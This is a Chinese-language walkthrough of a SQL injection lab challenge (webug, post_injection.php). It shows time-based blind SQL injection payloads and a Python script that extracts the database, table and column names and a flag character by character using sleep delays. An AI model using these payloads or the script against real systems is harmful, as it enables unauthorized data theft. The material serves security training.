打开页面,既然提示post注入,那么F12审查下元素找到表单如下,也就是在搜索框处。
图片.png
在搜索框中输入1',提交,发现报错。输入1'#,提交,返回正常,说明存在注入点。
由于不管输入什么返回都是一样的,用时间盲注(sleep等函数)。
payload:
1' or sleep(5)#
成功延时,然后测下数据库的长度,当长度为5时成功延时。
1' or if(length(database())=5,sleep(5),1)#
接下来写脚本跑数据,或者用sqlmap直接跑也能跑出。部分列名如下,可能服务器在虚拟机上,跑的贼慢,就不跑完了。
图片.png
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import time
chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{},!@#$%^&*()_+-="
url = "http://192.168.1.100/control/sqlinject/post_injection.php"
name = ""
# 难得的爆长度了,随便选个较大的。
for i in range(1, 50):
print(i)
for char in chars:
# 爆数据库名webug
# payload = "1' or if(ascii(substr(database()," + str(i) + ",1))=" + str(ord(char)) + ", sleep(5), 1)#"
# 爆表名
payload = "1' or if(ascii(substr((select group_concat(table_name) from information_schema.tables " \
"where table_schema=database())," + str(i) + ",1))=" + str(ord(char)) + ", sleep(5), 1)#"
# 爆列名
# payload = "1' or if(ascii(substr((select group_concat(column_name) from information_schema.columns " \
# "where table_name='输入列名')," + str(i) + ",1))=" + str(ord(char)) + ", sleep(5), 1)#"
# 爆字段
# payload = "1' or if(ascii(substr((select flag from flag)," + str(i) + ",1))=" + str(ord(char)) + ", sleep(5), 1)#"
data = {
"keyWordName": payload,
}
start = time.time()
res = requests.post(url, data=data)
end = time.time()
if end - start >= 5:
name += char
print(name)
break
